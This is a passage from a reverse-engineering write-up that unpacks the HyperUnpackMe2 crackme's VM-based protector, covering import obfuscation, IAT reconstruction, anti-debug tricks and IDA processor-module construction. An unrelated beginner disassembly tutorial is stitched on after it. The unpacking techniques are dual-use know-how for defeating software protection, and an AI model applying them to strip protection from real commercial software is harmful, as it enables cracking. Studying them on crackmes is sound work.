Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Reverse Engineering Advanced Programming Concepts

BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)

Preface

Throughout this article we will be breaking down the following programming concepts and analyzing the decompiled assembly versions of each instruction:

  1. Arrays
  2. Pointers
  3. Dynamic Memory Allocation
  4. Socket Programming (Network Programming)
  5. Threading

For the Part 1 of the BOLO: Reverse Engineering series, please click here.

Please note: While this article uses IDA Pro to disassemble the compiled code, many of the features of IDA Pro (i.e. graphing, pseudocode translation, etc.) can be found in plugins and builds for other free disassemblers such as radare2. Furthermore, while preparing for this article I took the liberty of changing some variable names in the disassembled code from IDA presets like “v20” to what they correspond to in the C code. This was done to make each portion easier to understand. Finally, please note that this C code was compiled into a 64 bit executable and disassembled with IDA Pro’s 64 bit version. This can be especially seen when calculating array sizes, as the 32 bit registers (i.e. eax) are often doubled in size and transformed into 64 bit registers (i.e rax).

Ok, Let’s begin!

While Part 1 broke down and described basic programming concepts like loops and IF statements, this article is meant to explain more advanced topics that you would have to decipher when reverse engineering.

Arrays

Let’s begin with Arrays, First, let’s take a look at the code as a whole:

Basic Arrays — Code

Now, let’s take a look at the decompiled assembly as a whole:

Basic Arrays — Decompiled assembly overview

As you can see, the 12 lines of code turned into quite a large block of code. But don’t be intimidated! Remember, all we’re doing here is setting up arrays!

Let’s break it down bit by bit:

Declaring an array with a literal — disassembled

When initializing an array with an integer literal, the compiler simply initializes the length through a local variable.

EDIT: The above photo labeled “Declaring an array with a literal — disassembled” is actually labeled incorrectly. While yes, when initializing an array with an integer literal the compiler does first initialize the length through a local variable, the above screenshot is actually the initialization of a stack canary. Stack Canaries are used to detect overflow attacks that may, if unmitigated, lead to execution of malicious code. During compilation the compiler allocated enough space for the only litArray element that would be used, litArray[0] (see photo below labeled “local variables — Arrays” — as you can see, the only litArray element that was allocated for is litArray[0]). Compiler optimization can significantly enhance the speed of applications.
Sorry for the confusion!

local variables — Arrays
Declaring an array with a variable — code
Declaring an array with a variable — assembly
declaring an array with pre-defined objects — code
declaring an array with pre-defined objects — assembly

When declaring an array with pre-defined index definitions the compiler simply saves each pre-defined object into its own variable which represents the index within the array (i.e. objArray4 = objArray[4])

initializing an array index — code

 

initializing an array index — assembly

 

Much like declaring an array with pre-defined index definitions, when initializing (or setting) an index in an array, the compiler creates a new variable for said index.

retrieving an item from an array — code

 

retrieving an item from an array — assembly

 

When retrieving items from arrays, the item is taken from the index within the array and set to the desired variable.

creating a matrix with variables — code

Creating a matrix with variables — assembly

When creating a matrix, first the row and column sizes are set to their row and col variables. Next, the maximum and minimum indexes for the rows and columns are calculated and used to calculate the base location / overall size of the matrix in memory.

inputting to a matrix — code
inputting to a matrix — assembly

When inputting into a matrix, first the location of desired index is calculated using the matrix’s base location. Next, the contents of said index location is set to the desired input (i.e. 1337).

Retrieving from a matrix — code
Retrieving from a matrix — assembly

When retrieving from a matrix the same calculation as performed during the input sequence for the matrix index is performed again but instead of inputting something into the index, the index’s contents are retrieved and set to a desired variable (i.e. MatrixLeet).

Pointers

Now that we understand how arrays are used / look in assembly, let’s move on to pointers.

ointers — Code

Let’s break the assembly down now:

int num = 10 in assembly

First we set int num to 10

.

pointer = &num

Next we set the contents of the num variable (i.e. 10) to the contents of the pointer variable.

printf num — assembly

We print out the num variable.

printf *pointer — assembly

We print out the pointer variable.

printf address of num — assembly

We print out the address of the num variable by using the lea (load effective address) opcode instead of mov.

printf address of num using pointer variable — assembly

We print the address of the num variable through the pointer variable.

rintf address of pointer — assembly

we print the address of the pointer variable using the lea (load effective address) opcode instead of mov.

Dynamic Memory Allocation

The next item on our list is dynamic memory allocation. In this tutorial I will break down memory allocation using:

  1. malloc
  2. calloc
  3. realloc

malloc — dynamic memory allocation

First, let’s take a look at the code:

Dynamic memory allocation using malloc — code

 

In this function we allocate 11 characters using malloc and then copy “Hello World” into the allocated memory space.

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see ‘nop’ instructions. these instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using malloc — assembly

When using malloc, first the size of the allocated memory (0x0B) is first moved into the edi register. Next, the _malloc system function is called to allocate memory. The allocated memory area is then stored in the ptr variable. Next, the “Hello World” string is broken down into “Hello Wo” and “rld” as it is copied into the allocated memory space. Finally, the newly copied “Hello World” string is printed out and the allocated memory is freed using the _free system function.

calloc — dynamic memory allocation

First, let’s take a look at the code:

dynamic memory allocation using calloc — code

Much like in the malloc technique, space for 11 characters is allocated and then the “Hello World” string is copied into said space. Then, the newly relocated “Hello World” is printed out and the allocated memory space is freed.

dynamic memory allocation using calloc — assembly

Dynamic memory allocation through calloc looks nearly identical to dynamic memory allocation through malloc when broken down into assembly.

First, space for 11 characters (0x0B) is allocated using the _calloc system function. Then, the “Hello World” string is broken down into “Hello Wo” and “rld” as it is copied into the newly allocated memory area. Next, the newly relocated “Hello World” string is printed out and the allocated memory area is freed using the _free system function.

realloc — dynamic memory allocation

First, let’s look at the code:

dynamic memory allocation using realloc — code

In this function, space for 11 characters is allocated using malloc. Then, “Hello World” is copied into the newly allocated memory space before said memory location is reallocated to fit 21 characters by using realloc. Finally, “1337 h4x0r @nonymoose” is copied into the newly reallocated space. Finally, after printing, the memory is freed.

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see ‘nop’ instructions. these instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using realloc — assembly

First, memory is allocated using malloc precisely as it was in the above “malloc — dynamic memory allocation” section. Then, after printing out the newly relocated “Hello World” string, realloc (_realloc system call) is called on the ptr variable (that represents the mem_alloc variable in the code) and a size of 0x15 (21 in decimal) is passed in as well. Next, “1337 h4x0r @nonymoose” is broken down into “1337 h4x”, “0r @nony”, “moos”, and “e” as it is copied into the newly re-allocated memory space. Finally, the space is freed using the _free system call

Socket Programming

Next, we’ll cover socket programming by breaking down a very basic TCP client-server chat system.

Before we begin breaking down the server / client code, it is important to point out the following line of code at the top of the file:

define the Port number

This line defines the PORT variable as 1337. This variable will be used in both the client and the server as the network port used to create the connection.

Server

First, let’s look at the code:

Server — Code

First, the socket file descriptor ‘server’ is created with the AF_INET domain, the SOCK_STREAM type, and protocol code 0. Next, the socket options and the address is configured. Then, the socket is bound to the network address / port and the server begins to listen on said server with a maximum queue length of 3. Upon receiving a connection, the server accepts it into the sock variable and reads the transmitted value into the value variable. Finally, the server sends the serverhello string over the connection before the function returns.

Now, let’s break it down into assembly:

initiating the server variables

